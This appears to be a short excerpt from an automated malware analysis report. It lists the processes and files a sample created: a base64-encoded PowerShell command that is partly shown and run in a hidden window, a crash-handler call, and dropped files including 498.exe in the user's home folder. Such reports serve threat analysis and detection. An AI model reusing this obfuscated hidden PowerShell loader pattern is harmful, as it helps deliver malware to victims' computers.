Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMQA5ADUAMgA0ADQAPQAnAHIAMQA5ADUAXwA2ACcAOwAkAEEANgBfADUANgA1ADYAIAA9ACAAJwA0ADkAOAAnADsAJABKADYAOAA1ADYAMgA5ADAAPQAnAFgAMAA2ADEANwA4ADgAJwA7ACQAWQAxADYANAAxADgAPQAkAGUAbgB2ADoAd...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\849394.cvr
- %HOMEPATH%\498.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMQA5ADUAMgA0ADQAPQAnAHIAMQA5ADUAXwA2ACcAOwAkAEEANgBfADUANgA1ADYAIAA9ACAAJwA0ADkAOAAnADsAJABKADYAOAA1ADYAMgA5ADAAPQAnAFgAMAA2ADEANwA4ADgAJwA7ACQAWQAxADYANAAxADgAPQAkAGUAbgB2ADoAd...' (with a hidden window)